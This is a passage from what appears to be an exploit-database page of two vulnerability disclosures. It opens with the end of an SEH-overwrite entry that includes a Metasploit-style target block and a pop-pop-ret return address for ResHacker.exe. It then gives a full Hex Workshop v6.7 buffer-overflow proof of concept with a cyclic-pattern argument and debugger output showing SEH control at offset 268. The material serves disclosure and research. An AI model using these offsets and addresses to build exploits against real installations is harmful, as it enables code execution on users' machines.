(nseh field) at 0x0018fcb4 overwritten with<br />normal pattern : 0x6a413969 (offset 268), followed by 12 bytes of cyclic<br />data after the handler<br /><br />0BADF00D ------------------------------<br />'Targets' =><br />[<br />[ '<fill in the OS/app version here>',<br />{<br /> 'Ret' => 0x00426446, #<br />pop eax # pop ebx # ret - ResHacker.exe (change this value from Mona,<br />with a not \x00 ret address)<br /> 'Offset' => 268<br />}<br />],<br />],<br /><br /></code></pre>
<pre><code># Exploit Title: Hex Workshop v6.7 - Buffer overflow DoS<br /># Discovery by: Rafael Pedrero<br /># Discovery Date: 2022-01-06<br /># Vendor Homepage: http://www.bpsoft.com, http://www.hexworkshop.com<br /># Software Link : http://www.bpsoft.com, http://www.hexworkshop.com<br /># Tested Version: v6.7<br /># Tested on: Windows 10<br /><br />CVSS v3: 7.3<br />CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H<br />CWE: CWE-119<br /><br />Hex Workshop v6.7 is vulnerable to denial of service via a command line<br />file arguments and control the Structured Exception Handler (SEH) records.<br /><br />Proof of concept:<br /><br />Open HWorks32.exe from command line with a large string in Arguments, more<br />than 268 chars:<br /><br />File 'C:\Hex Workshop\HWorks32.exe'<br />Arguments<br />'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag..."<br /><br />0BADF00D [+] Examining SEH chain<br />0BADF00D SEH record (nseh field) at 0x0089e63c overwritten with<br />unicode pattern : 0x00390069 (offset 268), followed by 0 bytes of cyclic<br />data after the handler<br /><br />The application crash.<br /><br /></code></pre>